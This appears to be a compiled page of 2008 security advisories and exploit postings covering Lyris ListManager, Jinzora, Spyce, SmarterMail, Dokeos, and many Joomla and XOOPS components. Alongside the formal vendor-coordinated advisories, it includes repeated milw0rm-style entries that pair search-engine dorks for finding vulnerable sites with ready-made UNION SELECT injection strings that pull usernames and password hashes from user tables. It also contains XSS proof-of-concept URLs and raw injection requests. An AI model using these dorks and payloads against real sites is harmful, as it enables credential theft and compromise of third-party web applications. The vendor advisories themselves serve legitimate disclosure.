-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Symantec Vulnerability Research http://www.symantec.com/research Security Advisory Advisory ID: SYMSA-2008-001 Advisory Title: Lyris ListManager - Multiple Vulnerabilities Author: Tyler Shields [EMAIL PROTECTED] Release Date: Wednesday, January 21, 2008 Application: Lyris List Manager Platform: Web Interface Severity: Remotely Exploitable Vendor status: Vendor has corrected products and is ok with public release CVE Number: CVE-2007-6319 Reference: http://www.securityfocus.com/bid/26792 Overview: "Lyris ListManager is the world's most popular software for creating, sending, and tracking highly effective email campaigns, newsletters, and discussion groups. From our new Template and Content Builder to our Image Library and new HTML editor, ListManager is the smarter, faster, easier way to manage all the aspects of your email marketing program." Details: 1. A user who is subscribed to any list on the ListManager system may modify client side information sent to the server related to their account, effectively elevating their privileges to list administrator. 2. A user who is subscribed to any list may gain access to arbitrary mailing lists by modifying client side information sent to the server. Accessing a preexisting mailing list on the ListManager system causes the active user to be added as a member or administrator to that list. 3. Once administrative access is granted, a vulnerability in the ListManager administrative interface allows an attacker to create new accounts that collide with existing accounts. This collision will result in overwriting data in the original account with the data from the new account. Vendor Response: Vendor has acknowledged and corrected the issue in several versions of the product. Recommendation: New versions of each major revision (8.95d, 9.2c and 9.3b), are available at http://www.lyris.com/support/listmanager/archives.html. Affected clients can download a new version and install it over the previous installation. Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. - ---Symantec Vulnerability Research Advisory Information--- For questions about this advisory, or to report an error: [EMAIL PROTECTED] For details on Symantec's Vulnerability Reporting Policy: http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf Symantec Vulnerability Research Advisory Archive: http://www.symantec.com/research/ Symantec Vulnerability Research GPG Key: http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc - -Symantec Product Advisory Information- To Report a Security Vulnerability in a Symantec Product: [EMAIL PROTECTED] For general information on Symantec's Product Vulnerability reporting and response: http://www.symantec.com/security/ Symantec Product Advisory Archive: http://www.symantec.com/avcenter/security/SymantecAdvisories.html Symantec Product Advisory PGP Key: http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc - --- Copyright (c) 2007 by Symantec Corp. Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Consulting Services. Reprinting the whole or part of this alert in any medium other than electronically requires permission from [EMAIL PROTECTED] Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Symantec, Symantec products, and Symantec Consulting Services are registered trademarks of Symantec Corp. and/or affiliated companies in the United States and other countries. All other registered and unregistered trademarks represented in this document are the sole property of their respective companies/owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHub+Cuk7IIFI45IARApcpAJ9x6KT4x2dvUerMthMOf6GtSh6WfwCgzuBV NXgp2vbVovME0XaN1Lt2/xA= =mDUZ -END PGP SIGNATURE-
joomla SQL Injection(com_genealogy)
### # # joomla SQL Injection(com_genealogy) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_genealogy" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_genealogy&task=profile&id=-999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-016
Application:Jinzora Media Jukebox
Versions Affected: 2.7.5
Vendor URL: http://www.jinzora.com/
Bugs: Multiple XSS Injections
Exploits: YES
Reported: 04.02.2008
Second report: 12.02.2008
Vendor response:NONE
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Jinzora system has multiple security vulnerabilities:
1. Linked XSS
2. Stored XSS
Details
***
1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL
string.
1.1 Linked XSS vulnerabiliies found in index.php.
GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".
Example:
http://[server]/[installdir]/index.php?frontend=
1.2 Linked XSS vulnerabilities found in ajax_request.php.
GET parameters "frontend", "theme", "language".
Example:
http://[server]/[installdir]/ajax_request.php?language=
1.3 Linked XSS vulnerability found in slim.php. GET parameter "jz_path".
Example:
http://[server]/[installdir]/slim.php?jz_path=
1.4 Linked XSS vulnerabilities found in popup.php.
GET parameters "frontend", "theme", "jz_path".
Example:
http://[server]/[installdir]/popup.php?theme=
1.5 Linked XSS in Path vulnerability found in index.php and slim.php.
Example:
http://[server]/[installdir]/index.php/";>alert('DSecRG XSS')
-
2. Stored XSS
2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter
name "siteNewsData"
Example:
siteNewsData = alert('DSecRG XSS')
2.1 Vulnerability found in script popup.php?ptype=playlistedit in post
parameter name "query"
Example:
query = alert('DSecRG XSS')
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:[EMAIL PROTECTED]
joomla SQL Injection(com_listoffreeads)
### # # joomla SQL Injection(com_listoffreeads) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_listoffreeads" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure on Spyce - Python Server Pages (PSP)
PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure
on Spyce - Python Server Pages (PSP)
Vulnerability found: 19th December 2007
Vendor informed: 14th January 2007
Vulnerability fixed: the vendor did not respond, however a workaround
has been included in the "Fix" section of this advisory.
Severity: Medium
Description:
All Spyce sample scripts that return client-supplied input back to the
browser are vulnerable to XSS. It is also possible to redirect users to
third-party sites and obtain the webroot path by not submitting required
parameters to certain scripts.
Note: tested on Spyce - Python Server Pages version 2.1.3
The following are only some examples that demonstrate XSS:
http://domain.foo/docs/examples/redirect.spy?url=%3CSCRIPT%3Ealert('Can%20Cross%20Site%20Attack')%3C/SCRIPT%3E&type=internal
http://domain.foo/docs/examples/handlervalidate.spy?x=";>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/request.spy?name="/>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/getpost.spy?Name="/>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/formtag.spy?="/>alert('Can%20Cross%20Site%20Attack')&foo=Submit!&mycheck=check1&mypass=secret&myradio=radio_option1&mytext=some&mytextarea=alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/formtag.spy?mypass=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
Other vulnerable scripts and unsanitized parameters:
Script: /demos/chat/
parameter: newline
Script: /docs/examples/formintro.spy
parameter: text1
Script: /docs/examples/formtag.spy
parameter: mytext
parameter: mydate
Script: /docs/examples/redirect.spy
parameter: type
Note: some XSS can only be exploited via POST requests (as opposed to
GET). This could be done by using an embedded HTML form with
"method='POST'" attribute and a JavaScript snippet that causes the form
to auto-submits itself. Such form would be located on a third-party site.
Cross-domain redirect PoC:
http://domain.foo/spyce/examples/redirect.spy?url=www.procheckup.com&type=external
Requesting the following URL returns the server's webroot:
http://domain.foo/spyce/examples/automaton.spy
Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to a Spyce-based site.
Such code would run within the security context of the target domain.
This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.:
session IDs) to unauthorised third parties.
Attackers can redirect victim users to third-party sites. Such behaviour
can help attackers perform phishing attacks by redirecting the victim to
a spoof login page.
Fix:
Remove sample scripts from live environments.
References:
http://www.procheckup.com/Vulnerabilities.php
http://spyce.sourceforge.net/
Credits: Richard Brain, Jan Fry, and Bruno Kovacs of ProCheckUp Ltd
(www.procheckup.com)
Legal:
Copyright 2008 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
joomla SQL Injection(com_facileforms)
### # # joomla SQL Injection(com_facileforms) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_facileforms" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module myTopics-print SQL Injection(articleid)
### # #XOOPS Module myTopics-print SQL Injection(articleid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: "/modules/myTopics/" # # you can add expliot after mytopics # example /modules/myTopics/ (exploit) EXPLOIT : print.php?articleid=-999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module wflinks SQL Injection(cid)
### # #XOOPS Module wflinks SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: modules/wflinks/viewcat.php # # DORK 2 : allinurl: modules/wflinks # example http://xx.com/modules/wflinks/viewcat.php?cid= [exploit] EXPLOIT : -88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
joomla SQL Injection(com_geoboerse)
### # # joomla SQL Injection(com_geoboerse) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_geoboerse" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_geoboerse&page=view&catid=-1/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
joomla SQL Injection(com_detail)
### # # joomla SQL Injection(com_detail) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_detail" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_detail&[EMAIL PROTECTED]&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
joomla SQL Injection(com_team
### # # joomla SQL Injection(com_team) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_team" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
SmarterMail Enterprise 4.3 - malformed mail XSS
Product: SmarterMail Enterprise 4.3 Web product: http://www.smartertools.com/Products/SmarterMail/O verview.aspx web product demo: http://maildemo.smartertools.com/Login.aspx Apparently this webmail is vulnerable to an attack xss very dangerous because it runs automatically when you open the inbox. The vulnerability is to create a malformed mail, the procedure is to add a line of code on the subject and this causes the execution of xss in your inbox. Simply add the following line of code in the subject of the mail to execute the subject: The line of code is stored in the text file by precautions that just copy and paste it into the subject of the mail to test concept http://es.geocities.com/jplopezy/SmarterMailXSS.txt I hope that will be useful greetings! Juan Pablo Lopez Yacubian fuzzertina.blogspot.com
joomla SQL Injection(com_formtool)
### # # joomla SQL Injection(com_formtool) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_formtool" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_formtool&task=view&formid=2&catid=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
joomla SQL Injection(com_iigcatalog)
### # # joomla SQL Injection(com_iigcatalog) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_iigcatalog" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_iigcatalog&Itemid=56&act=viewCat&cat=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module section SQL Injection(articleid)
### # # XOOPS Module section SQL Injection(articleid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: modules/wfsection/print.php?articleid= # EXPLOIT : -999+union/**/select/**/char(117,115,101,114,110,97,109,101,58),1,2,concat(uname,0x3a,pass),0,0,0,0,0,0,1,1,1,1,0,char(117,115,101,114,110,97,109,101,58),0,0,0,1,2,2,0,0,0,2,2,2+from/**/xoops_users/*%20where%20pass%20admin%20 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-015
Application:Dokeos E-Learning System
Versions Affected: 1.8.4
Vendor URL: http://dokeos.com
Bugs: Multiple SQL Injections,Multiple Blind SQL
Injections,Multiple XSS, etc.
Exploits: YES
Reported: 25.01.2008
Vendor response:28.01.2008
Patch released: 12.02.2008
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Dokeos E-Learning System system has multiple security vulnerabilities:
1. Multiple SQL Injections
2. Multiple Blind Sql Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS
Details
***
1. Multiple SQL Injections
1.1 Attacker can inject SQL code in module /whoisonline.php vulnerable
parametr id
Attacker must have valid user creditionals
Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*
1.2 Attacker can inject SQL code in module main/mySpace/index.php vulnerable
parameter tracking_list_coaches_column
Example:
http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin
&tracking_list_coaches_column=0';
1.3 Attacker can inject SQL code in module
/dokeos/main/create_course/add_course.php POST Parameter tutor_name
Example:
POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php
title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&
tutor_name='
-
2. Multiple SQL Injections
2.1 Vulnerability found in script index.php in header parameter "Referer"
Example:
GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '
2.1 Vulnerability found in script /main/admin/class_list.php? in header
parameter "X-Fowarded-For"
-
3. Stored XSS vulnerability found in /main/auth/inscription.php attacker can
inject XSS in POST parameter username
-
4. Multiple linked XSS
4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php
attacker can inject XSS in parameter courseCode
Example:
http://[server]/[installdir]/main/calendar/myagenda.php?courseCode=";>alert('DSecRG
XSS')
4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker
can inject XSS in parameter category
Example:
http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=alert('DSecRG
XSS') HTTP/1.0
4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php
attacker can inject XSS in parameter cmessage
Example:
http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27>
-
5. Image XSS vulnerability in page main/auth/profile.php attacker can upload
avatar picture with XSS code:
Example:
More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian)
-
Fix Information
***
Vendor fix this flaw on 12.02.2008. Patch for version 1.8.4 can be downloaded
here:
http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
Digital Security Research Groupmailto:[EMAIL PROTECTED]
